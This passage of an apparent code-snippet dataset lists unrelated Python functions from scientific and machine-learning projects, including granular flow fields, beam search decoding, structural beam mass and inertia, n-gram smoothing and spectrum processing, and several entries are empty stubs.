LENGTH**2\n\n gamma = beta*numpy.exp(-rad2)*MODIFIER\n\n volume[point_index] += gamma\n\n velocity[point_index, :] += particle.vel*gamma\n\n volume /= 
0.5*LENGTH**2*(1.0-numpy.exp(-1.0**2))\n velocity /= 0.5*LENGTH**2*(1.0-numpy.exp(-1.0**2))\n\n for i in range(3):\n velocity[:, i] /= volume\n\n for k, particle in enumerate(bucket):\n point_list = vtk.vtkIdList()\n locator.FindPointsWithinRadius(LENGTH, particle.pos, point_list)\n\n beta = 1.0/6.0*numpy.pi*particle.parameters.diameter**3\n\n for _ in range(point_list.GetNumberOfIds()):\n point_index = point_list.GetId(_)\n\n rad2 = distance2(poly_data.GetPoints().GetPoint(point_index), particle.pos)\n rad2 /= LENGTH**2\n\n gamma = beta*numpy.exp(-rad2)*MODIFIER\n\n c = distance2(particle.vel, velocity[k, :])\n\n temperature[point_index] += c*gamma\n\n\n for particle in bucket:\n point_list = vtk.vtkIdList()\n locator.FindPointsWithinRadius(LENGTH, particle.pos, point_list)\n\n beta = 1.0/6.0*numpy.pi*particle.parameters.diameter**3\n\n for _ in range(point_list.GetNumberOfIds()):\n point_index = point_list.GetId(_)\n\n rad2 = distance2(poly_data.GetPoints().GetPoint(point_index), particle.pos)\n rad2 /= LENGTH **2\n\n gamma = beta*numpy.exp(-rad2)*MODIFIER\n\n c = distance2(particle.vel, velocity[point_index, :])\n\n val = (bucket.particles[point_index].pos-particle.pos)/LENGTH**2\n\n spg = ((radial_distribution_function(volume[point_index])\n +volume[point_index]*rdf_deriv(volume[point_index]))*temperature[point_index]\n +c*volume[point_index]*radial_distribution_function(volume[point_index]))\n\n solid_pressure_gradient[point_index, :] += (val*spg*gamma)\n\n for _ in range(poly_data.GetNumberOfPoints()):\n\n solid_pressure[_] = (bucket.particles[0].parameters.rho*volume[_]\n *radial_distribution_function(volume[_])*temperature[_])\n\n data = [vtk.vtkDoubleArray()]\n data[0].SetName('SolidVolumeFraction')\n data.append(vtk.vtkDoubleArray())\n data[1].SetName('SolidVolumeVelocity')\n data[1].SetNumberOfComponents(3)\n data.append(vtk.vtkDoubleArray())\n data[2].SetName('GranularTemperature')\n data.append(vtk.vtkDoubleArray())\n data[3].SetName('SolidPressure')\n data.append(vtk.vtkDoubleArray())\n data[4].SetName('SolidPressureGradient')\n data[4].SetNumberOfComponents(3)\n\n for _ in range(poly_data.GetNumberOfPoints()):\n data[0].InsertNextValue(volume[_])\n data[1].InsertNextTuple3(*velocity[_])\n data[2].InsertNextValue(temperature[_])\n data[3].InsertNextValue(solid_pressure[_])\n data[4].InsertNextTuple3(*solid_pressure_gradient[_])\n\n for _ in data:\n poly_data.GetPointData().AddArray(_)\n\n return data[4]", "def analyse ( self ) :\n \n ## get all B0 particles\n bs1 = self.gselect ( 'bs1' , \"[ Beauty => ( D_s+ ==> K- K+ pi+ ) K-]CC \")\n bs2 = self.gselect ( 'bs2' , \"[ Beauty -> ( D_s+ --> K- K+ pi+ ) K-]CC \")\n \n cnt = self.counter(\"#1 + photos \")\n cnt += bs1.size()\n \n cnt = self.counter(\"#2 - photos \")\n cnt += bs2.size()\n\n if len(bs1) != len(bs2) :\n self.Warning(\" FOUND!!!!\" , SUCCESS )\n for b in bs1:\n print ' With PHOTOS: ', b.decay() , b.barcode()\n for b in bs2:\n print ' Without PHOTOS: ', b.decay() , b.barcode()\n \n \n return SUCCESS # RETURN ", "def analyse(self):\n pass", "def __calc_s(self, df):\n df.loc[:, \"avg_num_drivers\"] = df.idle + df.incoming\n s = df.total / df.avg_num_drivers # df.total := amount of demand\n s[s > 1] = 1\n s[np.isnan(s)] = 0.0001\n s[np.isinf(s)] = 1\n\n df.loc[:, \"prob_of_s\"] = s\n df = df[[\"zone_id\", \"prob_of_s\"]]\n return df", "def setUp(self):\n \n n_f = 6\n self.n_f = n_f\n self.freq = 10. + np.arange(n_f)\n Beam = pol_beam.SimpleBeam(self.freq)\n self.width = 0.9 + (np.arange(n_f) / 5. 
/ n_f)\n self.sigma = self.width / (2 * np.sqrt(2 * np.log(2)))\n Beam.set_width(self.width)\n self.Beam = Beam", "def _secondary_beam(self, hdr):\n # Called ApSecondaryNano in OpenMIMS\n d = {}\n tmp = unpack(self._bo + 'd 42i 2d', hdr.read(192))\n d['E0W'], d['ES'] = tmp[:2]\n d['ES widths'] = tmp[2:12]\n d['ES heights'] = tuple(tmp[12:22])\n d['AS'] = tmp[22]\n d['AS widths'] = tuple(tmp[23:33])\n d['AS heights'] = tuple(tmp[33:43])\n d['EnS'], d['EnS width'] = tmp[43:]\n return d", "def computePValues(options,whole_mapped_data,mapped_data_per_size_per_register,phase,cycle):\n min_reads_mapped_to_a_phased_register=3\n min_reads_in_a_window=10\n chromosome_hits=[]\n for chromosome in sorted(mapped_data_per_size_per_register):\n chromosome_hits.append(chromosome)\n fhr=open(options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\"_\"+chromosome+\".regionsOfInterest\",\"r\")\n fhw=open(options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\"_\"+chromosome+\".regionsOfInterest.concentrated\",\"w\")\n for line in fhr:\n register,start,end=line.strip().split()\n register=int(register)\n start=int(start)\n end=int(end)\n \n begin=start\n #print(chromosome,register,start,end)\n sys.stdout.flush()\n while begin+(phase*min_reads_mapped_to_a_phased_register) <= end+1:\n finish=begin+(phase*cycle)-1\n \n k=0\n for i in range(begin,finish+1):\n #print(chromosome,register,i,phase,start,end)\n try:\n k+=mapped_data_per_size_per_register[chromosome][register][i]\n except KeyError:\n pass\n #print(\"Next\")\n if k<min_reads_mapped_to_a_phased_register: \n begin+=phase\n continue\n \n num_all_reads=0\n for i in range(begin,finish+1):\n try:\n num_all_reads+=whole_mapped_data[chromosome][i]\n except KeyError:\n pass\n if num_all_reads<min_reads_in_a_window:\n begin+=phase\n continue\n \n n=0\n \"\"\"print(\"reached here\")\n sys.stdout.flush()\"\"\"\n # register_i is an iterator different from register\n for register_i in sorted(mapped_data_per_size_per_register[chromosome]):\n for i in range(begin,finish+1):\n try:\n n+=mapped_data_per_size_per_register[chromosome][register_i][i]\n except KeyError:\n pass\n \"\"\"if chromosome==\"Chr1\":\n print(str(n)+\" \"+str(num_all_reads)+\"\\n\")\"\"\"\n if n/num_all_reads<0.3:\n begin+=phase\n continue\n m=cycle*2\n pvalue=0\n for x in range(k,m+1):\n numerator=nCr((phase-1)*m,n-x)*nCr(m,x)\n pvalue+=numerator\n denominator=nCr(phase*m,n)\n pvalue=pvalue/denominator\n #print(chromosome,begin,finish,k,n,m,num_all_reads,pvalue,n/num_all_reads)\n if pvalue>=options.pvalue_cutoff:\n begin+=phase\n continue\n stuffs_to_be_printed_to_file=[register,begin,finish,k,n,m,num_all_reads,n/num_all_reads,pvalue]\n fhw.write(\"\\t\".join(map(str,stuffs_to_be_printed_to_file))+\"\\n\")\n sys.stdout.flush()\n begin+=phase", "def process_traces(self, s, h):\n # filter data\n if PAR.FREQLO and PAR.FREQHI:\n s = sbandpass(s, h, PAR.FREQLO, PAR.FREQHI)\n\n return s", "def getMeasures():", "def _steadystate2initial(self):\n self.ss_result = []\n ss = self.steady_state\n sizeclasses = numpy.unique(ss[:,0])\n for sc in sizeclasses:\n criterium = (ss[:,0]==sc)\n target = numpy.where(criterium)[0]\n div = len(target)\n masses = [ss[t, 1:].sum() for t in target]\n mass_sum = sum(masses)\n m = mass_sum / div\n m_std = self._std(masses)\n acids = ss[target, 1] / masses\n a = acids.sum() / div\n a_std = self._std(acids)\n waters = ss[target, 2] / masses\n w = waters.sum() / div\n w_std = self._std(waters)\n 
ethanols = ss[target, 3] / masses\n e = ethanols.sum() / div\n e_std = self._std(ethanols)\n nonsolubles = ss[target, 4] / masses\n n = nonsolubles.sum() / div\n n_std = self._std(nonsolubles)\n humuses = ss[target, 5] / masses\n h = humuses.sum() / div\n h_std = self._std(humuses)\n self.ss_result.append([m, m_std, a, a_std, w, w_std,\n e, e_std, n, n_std, h, h_std, sc])", "def score_grasps(self, grasp_vertices, grasp_normals, object_mass):\n raise NotImplementedError", "def compute_ps_mass(ps):\n\treturn sum(AA_mass_table[it] for it in ps)", "def __init__(sp, line) :\n ## frameNumber, eventName, photonEnergyEv, wavelengthA, GMD, peak_index, peak_x_raw, peak_y_raw, peak_r_assembled, peak_q, peak_resA, nPixels, totalIntensity, maxIntensity, sigmaBG, SNR\n #5, LCLS_2015_Feb22_r0169_022047_197ee, 6004.910515, 2.064714, 4.262349, 29997, 508.884796, 19.449471, 441.314606, 1.741234, 5.743053, 5, 361.105774, 112.819145, 19.236982, 18.771435\n\n sp.line = line[:-1] #.rstrip('\\n') # .replace(',',' ')\n sp.fields = sp.line.split()\n\n s_frameNumber, s_eventName, s_photonEnergyEv, s_wavelengthA, s_GMD, s_peak_index, s_peak_x_raw, s_peak_y_raw,\\\n s_peak_r_assembled, s_peak_q, s_peak_resA, s_nPixels, s_totalIntensity, s_maxIntensity, s_sigmaBG, s_SNR =\\\n sp.fields[0:16]\n\n sp.frameNumber, sp.photonEnergyEv, sp.wavelengthA = int(s_frameNumber), float(s_photonEnergyEv), float(s_wavelengthA)\n sp.GMD, sp.peak_index, sp.peak_x_raw, sp.peak_y_raw = float(s_GMD), int(s_peak_index), float(s_peak_x_raw), float(s_peak_y_raw)\n sp.peak_r_assembled, sp.peak_q, sp.peak_resA, sp.nPixels = float(s_peak_r_assembled), float(s_peak_q), float(s_peak_resA), int(s_nPixels)\n sp.totalIntensity, sp.maxIntensity, sp.sigmaBG, sp.SNR = float(s_totalIntensity), float(s_maxIntensity), float(s_sigmaBG), float(s_SNR)\n\n sp.runnum, sp.tstamp, sp.tsec, sp.s_fid = convertCheetahEventName(s_eventName)\n sp.fid = int(sp.s_fid, 16)\n\n #sp.seg, sp.row, sp.col = src_from_rc8x8(sp.peak_y_raw, sp.peak_x_raw)\n\n sp.line = line\n sp.empty = sp.empty_line()", "def test_set_sh(self):\n s = State(substance=\"water\")\n s.sh = Q_(3028.9867985920914, \"J/(kg*K)\"), Q_(1061602.391543017, \"J/kg\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.sh[0], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.sh[1], Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250.0, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore", "def powerflow_rule(_m, l, y, s, t):\r\n\r\n return (- m.sigma_27[l, y, s, t] + m.sigma_28[l, y, s, t]\r\n + (m.INCIDENCE_MATRIX[l, self.g(l)] * m.lamb[self.g(l), y, s, t])\r\n + (m.INCIDENCE_MATRIX[l, self.h(l)] * m.lamb[self.h(l), y, s, t])\r\n == 0)", "def test_set_vs(self):\n s = State(substance=\"water\")\n s.vs = Q_(0.4772010021515822, \"m**3/kg\"), Q_(3028.9867985920914, \"J/(kg*K)\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.vs[0], Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n 
assert np.isclose(s.vs[1], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore", "def detect_phasedbeam(self):\n raise NotImplementedError('For now, you could instead used dispersion code with dmarr=[0.]...')", "def welded_beam(self, u):\n assert len(u) == 4, 'Welded Beam design needs to specify 4 parameters.'\n assert u[0] != 0 and u[1] != 0 and u[2] != 0 and u[3] != 0, ('Designvalues {} cannot be zero').format(u)\n em = 6000.0 * (14 + u[1] / 2.0)\n r = sqrt(u[1] ** 2 / 4.0 + ((u[0] + u[2]) / 2.0) ** 2)\n j = 2.0 * (u[0] * u[1] * sqrt(2) * (u[1] ** 2 / 12.0 + ((u[0] + u[2]) / 2.0) ** 2))\n tau_p = 6000.0 / (sqrt(2) * u[0] * u[1])\n tau_dp = em * r / j\n tau = sqrt(tau_p ** 2 + 2.0 * tau_p * tau_dp * u[1] / (2.0 * r) + tau_dp ** 2)\n sigma = 504000.0 / (u[3] * u[2] ** 2)\n delta = 65856000.0 / (30 * 1000000 * u[3] * u[2] ** 2)\n pc = 4.013 * (30.0 * 1000000) * sqrt(u[2] ** 2 * u[3] ** 6 / 36.0) / 196.0 * (1.0 - u[2] * sqrt(30.0 * 1000000 / (4.0 * (12.0 * 1000000))) / 28.0)\n fitness = 1.10471 * u[0] ** 2 * u[1] + 0.04811 * u[2] * u[3] * (14.0 + u[1])\n return fitness", "def compute_statistics(self):", "def spectate(self):\n pass", "def process_state_info(self, state):\n K3Supervisor.process_state_info(self,state)\n\n # The pose for controllers\n self.parameters.pose = self.pose_est\n \n # Distance to the goal\n self.distance_from_goal = sqrt((self.pose_est.x - self.parameters.goal.x)**2 + (self.pose_est.y - self.parameters.goal.y)**2)\n \n # Sensor readings in real units\n self.parameters.sensor_distances = self.get_ir_distances()", "def update2(self, es, **kwargs):\n self._update_ps(es) # caveat: if es.B or es.D are already updated and ps is not, this goes wrong!\n p = self.ps\n try: pc_for_ps = 'pc for ps' in es.opts['vv'] # just in case\n except: pc_for_ps = False # 'vv' has an incompatible format or does't exist\n if pc_for_ps:\n # was: es.D**-1 * np.dot(es.B.T, es.pc)\n if es.opts['verbose'] > 5 and es.countiter == 1:\n utils.print_message('pc for ps is active')\n p = es.sm.transform_inverse(es.pc)\n try: # to filter coordinates or a\n p = es.path_for_sigma_update(p) # subspace depending on the state\n except AttributeError:\n if 11 < 3 and len(es.opts['integer_variables']):\n m = (\"Missing ``path_for_sigma_update`` attribute in {}.\"\n \"\\n This is usually not a problem unless integer mutations are used.\"\n \"\".format(type(es)))\n _warnings.warn(m)\n N = len(p)\n if N == 0: # all variables are masked, do nothing\n return 1\n if es.opts['CSA_squared']:\n s = (sum(_square(p)) / N - 1) / 2\n # sum(self.ps**2) / es.N has mean 1 and std sqrt(2/N) and is skewed\n # divided by 2 to have the derivative d/dx (x**2 / N - 1) for x**2=N equal to 1\n else:\n s = _norm(p) / Mh.chiN(N) - 1\n s *= self.cs / self.damps\n s_clipped = Mh.minmax(s, -self.max_delta_log_sigma, self.max_delta_log_sigma)\n # \"error\" handling\n if s_clipped != s:\n utils.print_warning('sigma change np.exp(' + str(s) + ') = ' + str(np.exp(s)) +\n ' clipped to np.exp(+-' + str(self.max_delta_log_sigma) + ')',\n 'update',\n 'CMAAdaptSigmaCSA',\n es.countiter, es.opts['verbose'])\n self.delta *= np.exp(s_clipped)\n return np.exp(s_clipped)", "def 
convertToSpectroGram(self):", "def __init__(self, n, sents, corpus='', gamma=None, addone=True):\n self.n = n\n self.smoothingtechnique = 'Interpolated (Jelinek Mercer) Smoothing'\n self.gamma = gamma\n self.addone = addone\n self.counts = counts = defaultdict(int)\n self.gamma_flag = True\n self.corpus = corpus\n # way more efficient than use set unions\n voc = ['</s>']\n for s in sents:\n voc += s\n self.voc = list(set(voc))\n\n if gamma is None:\n self.gamma_flag = False\n\n # if not gamma given\n if not self.gamma_flag:\n total_sents = len(sents)\n aux = int(total_sents * 90 / 100)\n # 90 per cent for training\n train_sents = sents[:aux]\n # 10 per cent for perplexity (held out data)\n held_out_sents = sents[-total_sents+aux:]\n\n train_sents = list(map((lambda x: ['<s>']*(n-1) + x), train_sents))\n train_sents = list(map((lambda x: x + ['</s>']), train_sents))\n\n for sent in train_sents:\n for j in range(n+1):\n # move along the sent saving all its j-grams\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # added by hand\n counts[('</s>',)] = len(train_sents)\n # variable only for tests\n self.tocounts = counts\n # search the gamma that gives lower perplexity\n gamma_candidates = [i*50 for i in range(1, 15)]\n # xs is a list with (gamma, perplexity)\n xs = []\n sents = train_sents\n for aux_gamma in gamma_candidates:\n self.gamma = aux_gamma\n aux_perx = self.perplexity(held_out_sents)\n xs.append((aux_gamma, aux_perx))\n xs.sort(key=lambda x: x[1])\n self.gamma = xs[0][0]\n with open('old-stuff/interpolated_' + str(n) + '_parameters_'+corpus, 'a') as f:\n f.write('Order: {}\\n'.format(self.n))\n f.write('Gamma: {}\\n'.format(self.gamma))\n f.write('AddOne: {}\\n'.format(self.addone))\n f.write('Perplexity observed: {}\\n'.format(xs[0][1]))\n f.write('-------------------------------\\n')\n f.close()\n\n else:\n sents = list(map((lambda x: ['<s>']*(n-1) + x), sents))\n sents = list(map((lambda x: x + ['</s>']), sents))\n\n for sent in sents:\n # counts now holds all k-grams for 0 < k < n + 1\n for j in range(n+1):\n # move along the sent saving all its j-grams\n for i in range(n-j, len(sent) - j + 1):\n ngram = tuple(sent[i: i + j])\n counts[ngram] += 1\n # added by hand\n counts[('</s>',)] = len(sents)", "def gather_pk_ss(self):\n # only works if peak is bigger than ss (otherwise will go to 1)\n \n _t_step = numpy.arange (1, 9, .2)\n _log_t_step = 1e-7 * 10 ** (_t_step) \n \n # take max 10mM relax mech 1\n r1 = Relaxation(self.m1.Qhi, self.m1.P_init_lo)\n r1.assemble(_log_t_step, self.m1.open_states)\n \n #take max of hi-conc jump\n self.peak1 = numpy.max(r1.relax_sum)\n # calc Iss mech 1\n self.eqbm1 = r1.relax_sum[-1] #steady state at 100 sec.\n \n # take max 10mM relax mech 2\n r2 = Relaxation(self.m2.Qhi, self.m2.P_init_lo)\n r2.assemble(_log_t_step, self.m2.open_states)\n \n #take max of hi-conc jump\n self.peak2 = numpy.max(r2.relax_sum)\n # calc Iss mech 2\n self.eqbm2 = r2.relax_sum[-1]\n \n self.fold_change = (self.eqbm1 * self.peak2) / (self.eqbm2 * self.peak1)", "def __init__(self, **kwargs):\n GaussBeam.__init__(self, **kwargs)\n self.scale = kwargs.get('scale',10.)\n self.mass = kwargs.get('mass', 6.0)\n self.s0 = kwargs.get('s0', 7.0)\n self.retro = kwargs.get('retro', 1.0)\n self.alpha = kwargs.get('alpha', 1.0)\n self.Er0 = Erecoil( self.l , self.mass) \n self.mW = 1000 * (self.s0 * self.Er0 ) \\\n * np.abs( np.pi / 8. 
/ uL(self.l) )\\\n * self.w[0]*self.w[1] / self.retro", "def vanilaScore(self,attended,state,W):", "def get_logSs(self):\n\n self.min_logS = 1E10\n self.max_logS = -1E10\n max_NHA = 0\n for m in self.components:\n prop_dict = m.read_prop_file()\n\n # Only get properties of the largest component.\n # Number of heavy atoms.\n NHA = prop_dict['NHA']\n if NHA >= max_NHA:\n self.min_logS = min([self.min_logS, prop_dict['logS']])\n self.max_logS = max([self.max_logS, prop_dict['logS']])\n max_NHA = NHA", "def apply_beam_settings(self):\n raise NotImplementedError", "def beam_search_step(state, logits, eos_id, beam_width, is_first_step,\n length_penalty):\n _, vocab_size = logits.shape\n\n bsz, beam_width = state.log_probs.shape\n onehot_eos = P.cast(\n F.one_hot(P.ones([1], 'int64') * eos_id, vocab_size), 'int64') #[1, V]\n\n probs = P.log(F.softmax(logits)) #[B*W, V]\n probs = mask_prob(probs, onehot_eos, state.finished) #[B*W, V]\n allprobs = P.reshape(state.log_probs, [-1, 1]) + probs #[B*W, V]\n\n not_finished = 1 - P.reshape(state.finished, [-1, 1]) #[B*W,1]\n not_eos = 1 - onehot_eos\n length_to_add = not_finished * not_eos #[B*W,V]\n alllen = P.reshape(state.lengths, [-1, 1]) + length_to_add\n\n allprobs = P.reshape(allprobs, [-1, beam_width * vocab_size])\n alllen = P.reshape(alllen, [-1, beam_width * vocab_size])\n allscore = hyp_score(allprobs, alllen, length_penalty)\n if is_first_step:\n allscore = P.reshape(\n allscore,\n [bsz, beam_width, -1])[:, 0, :] # first step only consiter beam 0\n scores, idx = P.topk(allscore, k=beam_width) #[B, W]\n next_beam_id = idx // vocab_size #[B, W]\n next_word_id = idx % vocab_size\n\n gather_idx = P.concat(\n [P.nonzero(idx != -1)[:, :1], P.reshape(idx, [-1, 1])], 1)\n next_probs = P.reshape(P.gather_nd(allprobs, gather_idx), idx.shape)\n next_len = P.reshape(P.gather_nd(alllen, gather_idx), idx.shape)\n\n gather_idx = P.concat([\n P.nonzero(next_beam_id != -1)[:, :1], P.reshape(next_beam_id, [-1, 1])\n ], 1)\n next_finished = P.reshape(\n P.gather_nd(state.finished, gather_idx), state.finished.\n shape) #[gather new beam state according to new beam id]\n #log.debug(gather_idx.numpy())\n #log.debug(state.finished.numpy())\n #log.debug(next_finished.numpy())\n\n next_finished += P.cast(next_word_id == eos_id, 'int64')\n next_finished = P.cast(next_finished > 0, 'int64')\n\n #log.debug(next_word_id.numpy())\n #log.debug(next_beam_id.numpy())\n next_state = BeamSearchState(\n log_probs=next_probs, lengths=next_len, finished=next_finished)\n output = BeamSearchOutput(\n scores=scores,\n predicted_ids=next_word_id,\n beam_parent_ids=next_beam_id)\n\n return output, next_state", "def canopy(self, h=3, b1=1):\n mu = min(5, 2 * h / self.sk)\n self.mu_canopy = mu\n self.s_canopy = self.mu_canopy * self.Ce * self.Ct * self.sk\n print(f'The canopy snow shape coeffeicient = {self.mu_canopy :.2f}')\n print(f'The peak canopy snow load = {self.s_canopy :.2f}kPa')", "def compute_hit_properties(w, raw_hits, argmaxes, areas, centers):\n for hit_i in range(len(raw_hits)):\n current_max = -999.9\n current_argmax = -1\n current_area = 0.0\n current_center = 0.0\n for i, x in enumerate(w[raw_hits[hit_i, 0]:raw_hits[hit_i, 1]+1]):\n if x > current_max:\n current_max = x\n current_argmax = i\n current_area += x\n current_center += i * x\n argmaxes[hit_i] = current_argmax\n areas[hit_i] = current_area\n centers[hit_i] = current_center / current_area", "def spectrum_processing(s):\n s = default_filters(s)\n s = add_precursor_mz(s)\n s = normalize_intensities(s)\n s = 
reduce_to_number_of_peaks(s, n_required=5, ratio_desired=0.5, n_max=500)\n s = select_by_mz(s, mz_from=0, mz_to=1000)\n s = add_losses(s, loss_mz_from=10.0, loss_mz_to=200.0)\n s = require_minimum_number_of_peaks(s, n_required=5)\n return s", "def get_center_of_mass_allies(self,obs):", "def S(self):\n Ae = 1.0/float(len(self.K)) \n return (self.avg_Ao() - Ae)/(1.0 - Ae)", "def _get_cbeam_mass_no_nsm(model, elem, mass, cg, inertia, reference_point):\n prop = elem.pid_ref\n xyz1, xyz2 = elem.get_node_positions()\n centroid = (xyz1 + xyz2) / 2.\n length = norm(xyz2 - xyz1)\n\n is_failed, out = elem.get_axes(model)\n if is_failed:\n model.log.error(str(out))\n raise RuntimeError(out)\n\n wa, wb, _ihat, jhat, khat = out\n p1 = xyz1 + wa\n p2 = xyz2 + wb\n if prop.type == 'PBEAM':\n rho = prop.Rho()\n # we don't call the MassPerLength method so we can put the NSM centroid\n # on a different axis (the PBEAM is weird)\n mass_per_lengths = []\n nsm_per_lengths = []\n for (area, nsm) in zip(prop.A, prop.nsm):\n mass_per_lengths.append(area * rho)\n nsm_per_lengths.append(nsm)\n mass_per_length = integrate_positive_unit_line(prop.xxb, mass_per_lengths)\n nsm_per_length = integrate_positive_unit_line(prop.xxb, nsm_per_lengths)\n #print('nsm/Ls=%s nsm/L=%s' % (nsm_per_lengths, nsm_per_length))\n #print('mass/Ls=%s mass/L=%s' % (mass_per_lengths, mass_per_length))\n nsm_n1 = (p1 + jhat * prop.m1a + khat * prop.m2a)\n nsm_n2 = (p2 + jhat * prop.m1b + khat * prop.m2b)\n nsm_centroid = (nsm_n1 + nsm_n2) / 2.\n\n elif prop.type == 'PBEAML':\n mass_per_lengths = prop.get_mass_per_lengths()\n #mass_per_length = prop.MassPerLength() # includes simplified nsm\n\n # m1a, m1b, m2a, m2b=0.\n nsm_centroid = (p1 + p2) / 2.\n\n # mass_per_length already includes nsm\n mass_per_length = integrate_positive_unit_line(prop.xxb, mass_per_lengths)\n nsm_per_length = 0.\n\n #nsm_centroid = np.zeros(3) # TODO: what is this...\n #nsm = prop.nsm[0] * length # TODO: simplified\n elif prop.type == 'PBCOMP':\n mass_per_length = prop.MassPerLength()\n nsm_per_length = prop.nsm\n nsm_n1 = (p1 + jhat * prop.m1 + khat * prop.m2)\n nsm_n2 = (p2 + jhat * prop.m1 + khat * prop.m2)\n nsm_centroid = (nsm_n1 + nsm_n2) / 2.\n elif prop.type == 'PBMSECT':\n return mass\n #mass_per_length = prop.MassPerLength()\n #m = mass_per_length * length\n #nsm = prop.nsm\n else: # pragma: no cover\n raise NotImplementedError(prop.type)\n\n m = mass_per_length * length\n nsm = nsm_per_length * length\n if CHECK_MASS and ((m + nsm) != elem.Mass() or not np.array_equal(centroid, elem.Centroid())): # pragma: no cover\n msg = 'CBEAM; eid=%s; %s pid=%s; m/L=%s nsm/L=%s; length=%s\\n' % (\n elem.eid, elem.pid, prop.type, mass_per_length, nsm_per_length, length)\n msg += 'mass_new=%s mass_old=%s\\n' % (m, elem.Mass())\n msg += 'centroid_new=%s centroid_old=%s\\n%s' % (\n str(centroid), str(elem.Centroid()), str(elem))\n raise RuntimeError(msg)\n\n #nsm = (nsm_per_length + nsmi) * length\n (x, y, z) = centroid - reference_point\n (xm, ym, zm) = nsm_centroid - reference_point\n x2 = x * x\n y2 = y * y\n z2 = z * z\n xm2 = xm * xm\n ym2 = ym * ym\n zm2 = zm * zm\n\n # Ixx, Iyy, Izz, Ixy, Ixz, Iyz\n inertia[0] += m * (y2 + z2) + nsm * (ym2 + zm2)\n inertia[1] += m * (x2 + z2) + nsm * (xm2 + zm2)\n inertia[2] += m * (x2 + y2) + nsm * (xm2 + ym2)\n inertia[3] += m * x * y + nsm * xm * ym\n inertia[4] += m * x * z + nsm * xm * zm\n inertia[5] += m * y * z + nsm * ym * zm\n massi = m + nsm\n mass += massi\n cg += m * centroid + nsm * nsm_centroid\n return mass", "def 
beam_search_MAP(logits, beam_size=20, lp=50.0):\n inf = 1e10\n distribution = tf.nn.softmax(logits)\n B, T, V = distribution.shape\n aligns = tf.zeros([B * beam_size, 0], tf.int32)\n scores = tf.constant([0.0] + [-inf]*(beam_size-1), dtype=tf.float32) # [beam_size]\n scores = tf.tile(scores, multiples=[B]) # [B x beam_size]\n base_indices = tf.reshape(tf.tile(tf.range(B)[:, None], multiples=[1, beam_size]), [-1])\n preds_prev = -1 * tf.ones([B * beam_size, beam_size], tf.int32)\n lengths = tf.zeros([B * beam_size], tf.int32)\n # marks_token = tf.zeros([B * beam_size, 0], tf.int32)\n prev = time()\n for t in range(T):\n p_prior = tf.ones([B*beam_size, V]) / V\n p_past = tf.ones([B*beam_size, V]) / V\n p_cur = tf.reshape(tf.tile(distribution[:, t, :], [1, beam_size]), [B*beam_size, V])\n p_log = tf.math.log(p_past) + tf.math.log(p_cur) - tf.math.log(p_prior)\n\n scores_cur, preds_cur = tf.nn.top_k(p_log, k=beam_size, sorted=True)\n\n # current scores\n scores = scores[:, None] + scores_cur # [B x beam_size, beam_size]\n scores = tf.reshape(scores, [B, beam_size ** 2])\n\n # current predicts\n marks_cur = tf.cast(tf.not_equal(preds_cur, preds_prev), tf.int32)\n\n # length penalty\n lengths = lengths[:, None] + marks_cur\n lp_score = tf.reshape(tf.pow((5+tf.cast(lengths, tf.float32))/6, lp), [B, beam_size ** 2])\n # lp_score = 1.0\n scores /= lp_score\n\n # pruning\n _, k_indices = tf.nn.top_k(scores, k=beam_size)\n k_indices = base_indices * beam_size * beam_size + tf.reshape(k_indices, [-1]) # [B x beam_size]\n\n # # update marks_token\n # marks_cur = tf.reshape(marks_cur, [-1])\n # marks_cur = tf.gather(marks_cur, k_indices)\n # marks_token = tf.gather(marks_token, k_indices // beam_size)\n # marks_token = tf.concat([marks_token, marks_cur[:, None]], 1)\n\n # update lengths\n lengths = tf.reshape(lengths, [-1])\n lengths = tf.gather(lengths, k_indices)\n\n # print('lengths:', (lengths - tf.reduce_sum((marks_token), -1)).numpy())\n\n # Update scores\n scores = tf.reshape(scores, [-1])\n scores = tf.gather(scores, k_indices)\n\n # update preds\n preds_prev = preds_cur\n preds_cur = tf.reshape(preds_cur, [-1])\n preds_cur = tf.gather(preds_cur, k_indices)\n # k_indices: [0~B x beam_size x beam_size], preds: [0~B x beam_size]\n aligns = tf.gather(aligns, k_indices // beam_size)\n aligns = tf.concat([aligns, preds_cur[:, None]], -1)\n\n print(time() - prev, 's')\n prev = time()\n\n aligns = aligns[::beam_size, :]\n # marks_token = marks_token[::beam_size, :]\n # lengths = lengths[::beam_size]\n # max_len = tf.reduce_max(lengths)\n # predicts = []\n # for b in range(B):\n # predict = tf.reshape(tf.gather(aligns[b, :], tf.where(marks_token[b, :]>0)), [-1])\n # pad = tf.zeros([max_len - lengths[b]], tf.int32)\n # predicts.append(tf.concat([predict, pad], 0))\n # tf.stack(predicts, 0)\n\n return aligns", "def Schechter_M(M, phi_s, M_s, alpha):\n\treturn 0.4 * n.log(10.) 
